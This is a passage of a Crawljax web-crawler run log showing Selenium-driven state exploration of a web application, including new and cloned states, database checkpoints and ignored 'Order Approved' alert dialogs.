[pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3141393 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3142618 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state498 added to the StateMachine. 3142618 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3142627 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3144915 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3146250 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3147428 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3148664 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Order Number 1234 Was Approved): Order Number 1234 Was Approved Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 3148684 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state499 added to the StateMachine. 3148684 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3148693 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3150942 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3152094 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3153407 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3154958 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state500 added to the StateMachine. 3154959 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3154968 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3157211 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3158436 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3159748 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3161288 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state501 and state372 are the same. 3161291 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3163535 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3164795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3165993 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3167234 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state502 added to the StateMachine. 3167234 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3167243 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3169483 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3170636 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3171823 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3173029 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state503 added to the StateMachine. 3173029 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3173037 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 3175277 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3176473 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3177669 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3178886 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state504 added to the StateMachine. 3178886 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3178894 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 3181169 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3182320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3183485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3184709 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state505 added to the StateMachine. 3184709 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3184717 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 3186991 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3188143 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3189706 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3191214 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state506 added to the StateMachine. 3191214 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3191223 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 3193466 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3194618 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3195909 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3197435 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state507 added to the StateMachine. 3197436 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3197444 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 5 states with unfired actions 3199718 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3200875 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3202046 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3203341 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state508 added to the StateMachine. 3203341 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3203351 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3205631 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3206782 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3207944 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3209152 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state509 added to the StateMachine. 3209152 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3209163 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3211432 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3212592 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3213758 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3214971 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state510 added to the StateMachine. 3214971 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3214979 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3217435 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3218619 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3219915 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3221425 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state511 added to the StateMachine. 3221426 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3221436 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3223724 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3224911 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3226191 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3227693 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state512 and state14 are the same. 3227698 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3229981 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3231168 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3232330 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3233543 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state513 added to the StateMachine. 3233543 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3233552 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3235842 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3237023 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3238182 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3239384 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Order Approved): Order Approved Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 3239402 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state514 added to the StateMachine. 3239402 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3239410 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3241679 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3242849 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3244161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3245644 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state515 added to the StateMachine. 3245644 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3245653 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3247939 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3249105 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3250411 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3251897 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state516 added to the StateMachine. 3251897 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3251905 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3254198 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3255369 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3256554 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3257761 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state517 added to the StateMachine. 3257761 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3257770 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3260014 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3261184 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3262347 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3263549 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Order Approved): Order Approved Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 3263569 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state518 added to the StateMachine. 3263569 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3263577 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3265847 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3267048 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3268336 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3269875 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state519 added to the StateMachine. 3269875 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3269884 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3272134 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3273469 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3274772 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3276299 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state520 and state516 are the same. 3276303 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3278573 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3279775 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3280953 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3282194 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state521 added to the StateMachine. 3282194 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3282202 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3284444 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3285683 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3286880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3288124 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state522 added to the StateMachine. 3288124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3288132 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3290376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3291532 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3292857 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3294386 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state523 added to the StateMachine. 3294386 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3294396 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3296638 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3297794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3299106 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3300632 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state524 and state14 are the same. 3300636 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3302881 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3304041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3305234 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3305611 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 3305612 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 3305618 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 3306144 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 3306147 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 3306444 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state525 added to the StateMachine. 3306444 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3306458 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3308713 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3309861 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3311053 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3312291 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state526 added to the StateMachine. 3312291 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3312306 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3314558 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3315716 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3317003 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3318526 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state527 added to the StateMachine. 3318526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3318536 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3320799 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3321952 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3323239 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3324775 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state528 and state516 are the same. 3324778 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3327067 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3328230 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3329392 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3330800 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state529 added to the StateMachine. 3330800 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3330810 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3333100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3334262 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3335439 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3336768 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state530 added to the StateMachine. 3336768 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3336777 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3339073 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3340233 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3341527 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3343271 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state531 added to the StateMachine. 3343272 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3343283 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3345563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3346719 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3348009 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3349799 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state532 and state516 are the same. 3349803 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3352077 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3353238 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3354409 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3355840 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state533 added to the StateMachine. 3355840 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3355850 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 4 states with unfired actions 3358128 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3359287 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3360456 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3361897 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state534 added to the StateMachine. 3361897 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3361906 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 3 states with unfired actions 3364214 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3365374 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3366662 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3368376 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state535 added to the StateMachine. 3368376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3368387 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 3 states with unfired actions 3370667 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3371827 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3373117 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3374803 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state536 and state14 are the same. 3374807 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 3 states with unfired actions 3377100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3378260 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3379455 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3380794 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state537 added to the StateMachine. 3380794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3380804 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3383091 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3384245 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3385530 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3387254 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state538 added to the StateMachine. 3387254 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3387265 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3389549 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3390705 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3391994 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3393677 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state539 and state516 are the same. 3393682 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3395956 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3397113 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3398401 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3400075 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state540 added to the StateMachine. 3400075 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3400089 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3402384 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3403542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3404837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3406363 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state541 and state516 are the same. 3406367 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3408634 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3409795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3411102 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3412630 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state542 added to the StateMachine. 3412630 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3412640 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3414922 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3416079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3417372 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3419044 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state543 and state516 are the same. 3419048 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3421324 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3422478 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3423769 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3425453 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state544 added to the StateMachine. 3425453 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3425467 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3427758 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3428920 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3430210 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3431749 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state545 and state516 are the same. 3431752 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3434030 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3435189 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3436489 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3438027 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state546 added to the StateMachine. 3438027 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3438036 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3440329 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3441485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3442778 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3444442 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state547 and state516 are the same. 3444446 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 